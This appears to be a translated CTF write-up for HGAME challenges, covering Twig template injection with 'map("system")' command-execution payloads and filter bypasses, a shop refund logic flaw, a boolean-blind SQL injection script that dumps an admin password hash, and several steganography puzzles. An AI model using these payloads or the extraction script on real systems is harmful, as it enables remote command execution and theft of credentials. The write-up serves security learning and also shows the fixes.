![在这里插入图片描述](https://img-blog.csdnimg.cn/ff71c85f99a84ed9b41360a721558ed1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Test it
![在这里插入图片描述](https://img-blog.csdnimg.cn/61cc1c4fc9a54654984303856c285308.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
It is a Twig v3.3.7 template, so look for known issues
- https://whoamianony.top/2021/08/22/Web安全/Twig 模板注入从零到一/
SSTI payloads
```twig
{{["id"]|map("system")}}
{{["id"]|map("passthru")}}
{{["id"]|map("exec")}} // no output
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/4f1f9c1bb6114165bec344257d14af70.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/e948d969c86e45fdbfd9ea8119f2f892.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
When trying to read the flag I found that `cat` is filtered; a simple bypass is enough
![在这里插入图片描述](https://img-blog.csdnimg.cn/d5db8d6006464eaeab7026b80e9aea1e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The response may not contain `hgame`? Then base64-encode the output before it is returned
/redirect.php?url={{["head /flag | base64"]|map("system")}}
![在这里插入图片描述](https://img-blog.csdnimg.cn/d86b6dd8bd714016ba1b1dd5e209fdea.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
For the record, here is the read method I used at first
![在这里插入图片描述](https://img-blog.csdnimg.cn/8b361637fbba4d35b631e66776ec30b9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
redirect.php?url={{["/usr/local/bin/php /flag | base64"]|map("system")}}
![在这里插入图片描述](https://img-blog.csdnimg.cn/9fa38696798643a29789893e9d417ce1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
```
PS C:\Users\Administrator> php -r "var_dump(base64_decode('aGdhbWV7IVR3MTktUzV0MX4xc15zMDBPME9faW50ZXIzc3QxbjV+IX0K'));"
Command line code:1:
string(42) "hgame{!Tw19-S5t1~1s^s00O0O_inter3st1n5~!}"
```
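The two filters above (the `cat` token on the way in, the string `hgame` on the way out) are the whole difficulty of this challenge, so here is an added helper, written for this writeup and not part of the original challenge or Twig, that packages the chain: it builds the `map("system")` payload, refuses commands containing the blocked token, wraps the command in `| base64` so the flag never appears verbatim in the response, and decodes the base64 back out of the rendered page. The injection point `redirect.php?url=` is the one shown above; the target base URL and the response body are constructed for the example.

```python
import base64
import re
from urllib.parse import quote

# From the writeup: the input filter rejected "cat", and the response was rejected
# whenever it contained "hgame", so command output is base64-wrapped on the way out.
BLOCKED_TOKENS = ("cat",)
FLAG_RE = re.compile(r"hgame\{[^}]*\}")


def twig_system_payload(cmd: str, wrap_base64: bool = True) -> str:
    """Build the Twig 3 payload {{["<cmd>"]|map("system")}} for a shell command."""
    lowered = cmd.lower()
    for tok in BLOCKED_TOKENS:
        if tok in lowered:
            raise ValueError(f"command contains blocked token {tok!r}; use head/tac/less instead")
    if '"' in cmd:
        raise ValueError("double quotes would terminate the Twig string literal")
    if wrap_base64:
        cmd = f"{cmd} | base64"          # keeps 'hgame' out of the raw response body
    return '{{["%s"]|map("system")}}' % cmd


def build_url(base: str, cmd: str) -> str:
    """URL for the injection point used above (redirect.php?url=), fully percent-encoded."""
    return f"{base}/redirect.php?url={quote(twig_system_payload(cmd), safe='')}"


def decode_response(html: str) -> str:
    """system() echoes the command output into the page; collect the base64 lines and decode."""
    # base64(1) wraps at 76 columns, so a long file arrives as several lines.
    lines = re.findall(r"^[A-Za-z0-9+/]{4,}={0,2}$", html, flags=re.M)
    if not lines:
        raise ValueError("no base64 output found in response")
    return base64.b64decode("".join(lines)).decode()


def extract_flag(html: str) -> str:
    match = FLAG_RE.search(decode_response(html))
    if match is None:
        raise ValueError("decoded output does not contain a flag")
    return match.group(0)


# Constructed response body: the base64 blob is the one decoded with php -r above.
SAMPLE_RESPONSE = (
    "<html><body>\n"
    "aGdhbWV7IVR3MTktUzV0MX4xc15zMDBPME9faW50ZXIzc3QxbjV+IX0K\n"
    "</body></html>"
)

if __name__ == "__main__":
    print(build_url("http://target", "head /flag"))
    print(extract_flag(SAMPLE_RESPONSE))
```

The root cause is that `redirect.php` hands user input to Twig as template source instead of as a template variable; a keyword blocklist on the input and a string match on the output do not change that, which is why `head`/`tac` plus base64 walk straight past both.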
Vidar shop demo
![在这里插入图片描述](https://img-blog.csdnimg.cn/1843a61a9e774a299f3ad80148aa2ed3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_17,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/6b01d2a350f04a24a73205978a1d6e91.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
All three JS files ship with .map files, so the source can be restored with reverse-sourcemap.
Reference: https://www.freebuf.com/articles/web/276810.html
With the source recovered you can analyse it yourself.
![在这里插入图片描述](https://img-blog.csdnimg.cn/ffb1d8a4055a463bb4e31dfde179c5f0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The vulnerability here, though, can be found by black-box testing alone.
Registration has some restrictions; it is easiest to register by editing the request in Burp, and you only need to respect the username and password length limits.
![在这里插入图片描述](https://img-blog.csdnimg.cn/1ed4a5ac1f3c422bafebf41d9cec6da4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
After registering and logging in you can see some of the user's information
![在这里插入图片描述](https://img-blog.csdnimg.cn/7e08a0b597644f789b7202363ce5cd4a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
First place an order for anything affordable, pay for it, and watch how the process works
![在这里插入图片描述](https://img-blog.csdnimg.cn/7d8f9f6ffac94a0991abad3c4971e7d0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
After paying, the account balance drops by 20
![在这里插入图片描述](https://img-blog.csdnimg.cn/12d8616ff5934369b52275f47deaf7be.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9ac3f9e951b64c2b99e2f3bea3124379.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Then notice that the paid order can be deleted
![在这里插入图片描述](https://img-blog.csdnimg.cn/544435a02cc44fc89a0a594b6a3419d8.png)
After deleting it, the balance that was deducted earlier is returned to the account
![在这里插入图片描述](https://img-blog.csdnimg.cn/b47e3305330d4b82b7e83d695a8fb1d6.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The balance increases by exactly the price of the cancelled order, so capture the request and look at the parameters
![在这里插入图片描述](https://img-blog.csdnimg.cn/e514a75ef4c24e3bb8b87edf68b2b30d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/edca271ebb5a4dafbe41926f0b2d958a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Only the order id is sent. Try changing it to the id of a more expensive order that has already been placed, for example the flag order
![在这里插入图片描述](https://img-blog.csdnimg.cn/778115e4ef08467d98cc9d365ea8540c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The flag order's price is credited to the balance, which is now enough; buy the flag directly, pay, and go back to the orders page to get the flag
![在这里插入图片描述](https://img-blog.csdnimg.cn/149910fd7e9848fb99713429c918c1df.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
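The bug is a business-logic one: the delete handler refunds an order's price without checking that the order was ever paid. The following is an added model of it in Python, written for this writeup and not the shop's real code, with the refund chain from above reproduced against the vulnerable handler and a hardened handler beside it. The `Shop`/`Order` classes, the balance of 100 and the prices are constructed; the real backend's owner check is not visible in the writeup, so the vulnerable version models only what was observed (money comes back regardless of payment status).

```python
from dataclasses import dataclass, field
from enum import Enum


class Status(Enum):
    UNPAID = "unpaid"
    PAID = "paid"
    CANCELLED = "cancelled"


@dataclass
class Order:
    id: int
    owner: str
    price: int
    status: Status = Status.UNPAID


@dataclass
class Shop:
    balances: dict = field(default_factory=dict)   # user -> balance (constructed data)
    orders: dict = field(default_factory=dict)     # order id -> Order
    next_id: int = 1

    def place(self, user: str, price: int) -> Order:
        order = Order(self.next_id, user, price)
        self.next_id += 1
        self.orders[order.id] = order
        return order

    def pay(self, user: str, order_id: int) -> None:
        order = self.orders[order_id]
        if order.owner != user or order.status is not Status.UNPAID:
            raise PermissionError("not your unpaid order")
        if self.balances[user] < order.price:
            raise ValueError("insufficient balance")
        self.balances[user] -= order.price
        order.status = Status.PAID

    def delete_order_vulnerable(self, user: str, order_id: int) -> None:
        # Assumed reconstruction of the observed bug: the handler trusts the order id
        # alone and credits the order's price back whether or not it was ever paid.
        order = self.orders.pop(order_id)
        self.balances[user] += order.price

    def delete_order_fixed(self, user: str, order_id: int) -> None:
        order = self.orders.get(order_id)
        if order is None or order.owner != user:
            raise PermissionError("order not found for this user")   # no cross-user cancel
        if order.status is Status.PAID:
            self.balances[user] += order.price   # refund only money that actually left the balance
        elif order.status is not Status.UNPAID:
            raise ValueError("order already cancelled")
        order.status = Status.CANCELLED          # state transition, so a second cancel cannot refund twice


def exploit(shop: Shop, user: str, flag_price: int) -> Order:
    """The writeup's chain: place the unaffordable flag order, delete it, then buy the flag for real."""
    flag_order = shop.place(user, flag_price)             # unpaid: balance is too low
    shop.delete_order_vulnerable(user, flag_order.id)     # refund of money never spent
    real = shop.place(user, flag_price)
    shop.pay(user, real.id)
    return real
```

The fix is not "hide the delete button for paid orders": refund amount and refund eligibility must both be derived from the server-side order state (owner, status, amount actually charged), and the cancel must be a one-way state transition rather than a row delete so it cannot be replayed.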
LoginMe
![在这里插入图片描述](https://img-blog.csdnimg.cn/3cd417d2acad45a38e4c6a23af48560c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_18,color_FFFFFF,t_70,g_se,x_16)
The only challenge in this HGAME where I got a blood (third blood, but still), so a memento
![在这里插入图片描述](https://img-blog.csdnimg.cn/bc3338d5da8c4ba0a5a5ecee37b472cc.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/8082b7cdd0df46e6a58273f90db4bdfb.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The page source contains a hint image
![在这里插入图片描述](https://img-blog.csdnimg.cn/28049e281bd84bdda179fa2012ea2c17.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/13d333c894ba457bab39b91c57075fca.png)
username: only the users admin and test exist, and the quote can be closed here to form an injection
```json
{"username":"admin' and '1","password":"mochu7"}
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/ef05d30e9c114aae90127c9bc416af01.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/8aedf2418be44d658009dfd85439f622.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Note that when the injected syntax is valid the response is {"msg":"success!"}, while a syntax error or a wrong username both return {"msg":"invalid username or password"}.
The hard part is telling a malformed injection apart from a filtered keyword, since both produce {"msg":"invalid username or password"}; it takes some probing.
After many attempts it seems `if` does not work here.
See my earlier article 记一次MySQL注入绕过: use `case when [expr] then [x] else [y] end` in place of `if` for the conditional
```json
{"username":"admin'and case when 1=1 then 1 else 0 end and '1","password":"mochu7"}
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/36dd8ccb5945476a8bee0127daa7f24f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/c1745afe5ace46d6a8f54c411350b9fe.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Dump admin's password directly
```python
import requests

asc_str = '0123456789abcdef'   # the stored password is a hex digest
burp0_url = "http://81906c3039.login.summ3r.top:60067/login"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
                 "Accept": "application/json, text/plain, */*",
                 "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                 "Accept-Encoding": "gzip, deflate",
                 "Content-Type": "application/json"}
password = ""
for i in range(1, 35):
    for s in asc_str:
        # boolean-blind: the row is only returned when the i-th character equals s
        payload = "admin'and case when substr(password,{},1)='{}' then 1 else 0 end and '1".format(i, s)
        burp0_json = {"password": "mochu7", "username": payload}
        resp = requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
        if 'success' in resp.text:
            password += s
            print(password)
            break   # character found, move to the next position
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/660a16df004f4bed915b2c9954fd6b17.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Log in as admin and get the flag
![在这里插入图片描述](https://img-blog.csdnimg.cn/403abb9890704763acebe26fa31bb439.png)
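To make the blind oracle reproducible offline, here is an added example, written for this writeup and not the challenge's real backend, that runs the same `case when` extraction against an in-memory SQLite table. The query shape (`username` spliced into a string, the password checked separately so any row match reads as "success") is an assumption about the backend; the `users` rows and `ADMIN_HASH` are constructed. A parameterised version of the same lookup is shown alongside so the difference is visible: the identical payload extracts nothing from it.

```python
import hashlib
import sqlite3

HEX = "0123456789abcdef"
# Constructed data: a 32-hex MD5 digest, matching the alphabet the writeup brute-forced.
ADMIN_HASH = hashlib.md5(b"constructed-admin-password").hexdigest()


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", ADMIN_HASH), ("test", hashlib.md5(b"test").hexdigest())])
    return db


def login_vulnerable(db: sqlite3.Connection, username: str) -> bool:
    # Assumed backend shape: the username is spliced into the SQL string, so
    # admin' and <expr> and '1 keeps the statement valid and makes the row's
    # presence depend on <expr>. A syntax error maps to the generic failure message.
    sql = f"SELECT password FROM users WHERE username = '{username}'"
    try:
        return db.execute(sql).fetchone() is not None      # {"msg":"success!"}
    except (sqlite3.Error, sqlite3.Warning):
        return False                                       # {"msg":"invalid username or password"}


def login_fixed(db: sqlite3.Connection, username: str) -> bool:
    # Parameterised: the payload is compared literally as a username and never matches.
    row = db.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def blind_extract(oracle, max_len: int = 32) -> str:
    """Boolean-blind extraction using CASE WHEN instead of the filtered IF()."""
    found = ""
    for i in range(1, max_len + 1):
        for c in HEX:
            payload = f"admin' and case when substr(password,{i},1)='{c}' then 1 else 0 end and '1"
            if oracle(payload):
                found += c
                break
        else:
            break   # no candidate matched: end of the value
    return found


if __name__ == "__main__":
    db = make_db()
    print(blind_extract(lambda u: login_vulnerable(db, u)) == ADMIN_HASH)   # True
    print(repr(blind_extract(lambda u: login_fixed(db, u))))                # ''
```

`case when ... end` is plain SQL in MySQL and SQLite alike, which is why blocking `if` buys nothing; the only control that works is keeping user input out of the query text.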
Level - Week4
MISC
摆烂 (Slacking off)
![在这里插入图片描述](https://img-blog.csdnimg.cn/a88cbd7d586a4a62a6446345c5f11a09.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/08aa1b63e5db4b4d95229a1aadedc094.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/6d01ce459c2b46a590095db4a69e8018.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Judging by the chunk structure it is an APNG; split it with apng disassembler
![在这里插入图片描述](https://img-blog.csdnimg.cn/30584c64b7874187b8051f4af84bc831.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/87f86b5d6eaa463aadfe4acea9949d3d.png)
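The "structure" that gives an APNG away is the chunk list: an `acTL` chunk after `IHDR`, and each frame introduced by `fcTL` with its data in `IDAT` (first frame) or `fdAT` (later frames). As an added example, not part of the original writeup or of apngdis, the following Python walks the chunks, verifies CRCs, and writes each frame out as a standalone PNG, which is exactly what the disassembler step does. The two-frame input is constructed inline (one 1x1 red frame, one 2x1 green frame) so it runs without the challenge file.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def iter_chunks(blob: bytes):
    """Yield (type, data) for every chunk, checking the signature and each CRC."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos < len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc, = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, data
        pos += 12 + length


def split_apng(blob: bytes) -> list:
    """Disassemble an APNG into standalone PNGs, one per fcTL frame."""
    ihdr = None
    frames = []   # [fcTL data, [image data parts]]
    for ctype, data in iter_chunks(blob):
        if ctype == b"IHDR":
            ihdr = data
        elif ctype == b"fcTL":
            frames.append([data, []])
        elif ctype == b"IDAT" and frames:
            frames[-1][1].append(data)        # default image doubles as frame 0 when fcTL precedes it
        elif ctype == b"fdAT":
            frames[-1][1].append(data[4:])    # strip the 4-byte sequence number
    if ihdr is None:
        raise ValueError("missing IHDR")
    out = []
    for fctl, parts in frames:
        w, h = struct.unpack(">II", fctl[4:12])
        frame_ihdr = struct.pack(">II", w, h) + ihdr[8:]   # frame size, same depth/colour type
        out.append(PNG_SIG + chunk(b"IHDR", frame_ihdr)
                   + chunk(b"IDAT", b"".join(parts)) + chunk(b"IEND", b""))
    return out


def png_size(blob: bytes) -> tuple:
    for ctype, data in iter_chunks(blob):
        if ctype == b"IHDR":
            return struct.unpack(">II", data[:8])
    raise ValueError("missing IHDR")


def png_raw_scanlines(blob: bytes) -> bytes:
    """Inflate the IDAT stream (filter bytes included) of a standalone PNG."""
    return zlib.decompress(b"".join(d for t, d in iter_chunks(blob) if t == b"IDAT"))


def build_sample_apng() -> bytes:
    """Constructed two-frame 8-bit RGB APNG: 1x1 red, then 2x1 green."""
    def fctl(seq, w, h):
        # sequence, width, height, x_off, y_off, delay_num, delay_den, dispose_op, blend_op
        return struct.pack(">IIIIIHHBB", seq, w, h, 0, 0, 1, 10, 0, 0)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    red = zlib.compress(b"\x00\xff\x00\x00")                 # filter byte + one RGB pixel
    green = zlib.compress(b"\x00\x00\xff\x00\x00\xff\x00")   # filter byte + two RGB pixels
    return (PNG_SIG + chunk(b"IHDR", ihdr)
            + chunk(b"acTL", struct.pack(">II", 2, 0))       # 2 frames, loop forever
            + chunk(b"fcTL", fctl(0, 1, 1)) + chunk(b"IDAT", red)
            + chunk(b"fcTL", fctl(1, 2, 1)) + chunk(b"fdAT", struct.pack(">I", 2) + green)
            + chunk(b"IEND", b""))


if __name__ == "__main__":
    for n, frame in enumerate(split_apng(build_sample_apng())):
        with open(f"frame{n}.png", "wb") as fh:
            fh.write(frame)
```

Listing `[t for t, _ in iter_chunks(data)]` on a suspect file is the quick check: a plain PNG never contains `acTL`, `fcTL` or `fdAT`.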
The frames look identical but differ in size, so guess blind watermark
![在这里插入图片描述](https://img-blog.csdnimg.cn/007fb99a233a4fa8922870d07c6a185d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
This gives the archive password: 4C*9wfg976
![在这里插入图片描述](https://img-blog.csdnimg.cn/b468ebd65c724e78bd6bcfa7f82a7897.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
A jigsaw; assemble it in PS
![在这里插入图片描述](https://img-blog.csdnimg.cn/52da40facde74fdbb3aec832db652d00.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/ea6e315d6a8c42a79f7765d6a20aa4d1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Scan the assembled QR code with an online reader: https://products.aspose.app/barcode/recognize#
![在这里插入图片描述](https://img-blog.csdnimg.cn/3b9078d744db445386d829a06d4d4f96.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/e12dcebc53e3471d8127b40612457628.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Zero-width character steganography: https://330k.github.io/misc_tools/unicode_steganography.html
![在这里插入图片描述](https://img-blog.csdnimg.cn/0770c0a1ab2341c4b9e883d75af9fd89.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{1_W4nT_T0_p1Ay_r0Tten}
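Zero-width steganography hides bits in Unicode characters that render as nothing (U+200B ZERO WIDTH SPACE, U+200C ZERO WIDTH NON-JOINER, U+200D ZERO WIDTH JOINER, ...), so the visible text is unchanged while the string length is not. The following is an added encoder/decoder pair, written for this writeup; the bit-to-character mapping is my own choice and is not the scheme the linked 330k tool uses, so it will not decode that tool's output directly. The cover text and secret are constructed.

```python
# Own mapping (assumption, not the 330k tool's): one bit per zero-width character.
ZW = {"0": "\u200b", "1": "\u200c"}   # ZERO WIDTH SPACE, ZERO WIDTH NON-JOINER
TERM = "\u200d"                        # ZERO WIDTH JOINER terminates the hidden message
INV = {v: k for k, v in ZW.items()}
ZERO_WIDTH = "\u200b\u200c\u200d\u2060\ufeff"


def zw_encode(cover: str, secret: str) -> str:
    """Embed secret (UTF-8) as zero-width characters right after the cover's first character."""
    bits = "".join(f"{byte:08b}" for byte in secret.encode("utf-8"))
    hidden = "".join(ZW[b] for b in bits) + TERM
    return cover[:1] + hidden + cover[1:]


def zw_decode(text: str) -> str:
    """Collect the zero-width characters in order, stop at the terminator, rebuild the bytes."""
    bits = []
    for ch in text:
        if ch == TERM:
            break
        if ch in INV:
            bits.append(INV[ch])
    usable = len(bits) - len(bits) % 8
    raw = bytes(int("".join(bits[i:i + 8]), 2) for i in range(0, usable, 8))
    return raw.decode("utf-8")


def has_zero_width(text: str) -> bool:
    """Triage check: does the text contain any zero-width code point at all?"""
    return any(ch in ZERO_WIDTH for ch in text)


def strip_zero_width(text: str) -> str:
    return "".join(ch for ch in text if ch not in ZERO_WIDTH)


if __name__ == "__main__":
    stego = zw_encode("Happy Valentine's Day", "hgame{example}")    # constructed values
    print(len(stego), has_zero_width(stego), zw_decode(stego))
```

In practice the giveaway is the length: a string whose `len()` is far larger than what is rendered, or which `has_zero_width` flags, is worth feeding to a decoder, and `strip_zero_width` shows what the reader was meant to see.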
At0m的给你们的(迟到的)情人节礼物 (At0m's belated Valentine's gift for you all)
![在这里插入图片描述](https://img-blog.csdnimg.cn/6f4466657d11426aba9c054ee1ba6925.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The attachment is a RAR archive; extract it with WinRAR
![在这里插入图片描述](https://img-blog.csdnimg.cn/7222593330a04aafa0a7f3c2ccc6ef0a.png)
Scanning with NtfsStreamsEditor finds a file hidden in an NTFS alternate data stream
![在这里插入图片描述](https://img-blog.csdnimg.cn/4e5aaa0cc3374b979d629ec8f93505ac.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
秋名山车神Atom开车啦 (roughly: "Akina's drift king Atom is driving")
4 up left down up right down up left up down right down up left down up right down up left up down right down up left down up right up down left up down right down up left down up right down up left up down right down up left up down down up up down right down up left up down right up down left up down right down up left up down right up
gift.mp4
In the video, a piece of information is visible when the author switches windows
![在这里插入图片描述](https://img-blog.csdnimg.cn/6535ee81422f458694ce63148cf2ee33.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
gift2.avi very probably went through MSU StegoVideo, but MSU Stego needs a numeric password to extract from the video
The file hidden in the NTFS stream talks about driving, then starts with a 4 followed by up/down/left/right directions; I traced them with a pen
![在这里插入图片描述](https://img-blog.csdnimg.cn/56094f3f1249434ea8dcf2dcbb419dfd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Tracing produced an H shape; together with the driving theme, guess it is the shift pattern of a manual gearbox
![在这里插入图片描述](https://img-blog.csdnimg.cn/2d985a60d5cf43909ec75a91b441c2d7.png)
It starts in 4th gear and only ever moves among gears 1-4, so guess base 4; write down the gears passed through along the way
![在这里插入图片描述](https://img-blog.csdnimg.cn/313cfb3e96f94928a9125d99c39c9b45.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
That gives a digit string; a short Python script converts it into the password
```python
from binascii import unhexlify

# Gears passed through, read off the H pattern; gear n stands for base-4 digit n-1
data = '424142414231424141214131413'
quater_num = ''
for n in data:
    quater_num += str(int(n) - 1)
flag = unhexlify(hex(int(quater_num, 4))[2:])
print(flag)
```
```
PS C:\Users\Administrator\Downloads\gift\gift> python .\code.py
b'7767122'
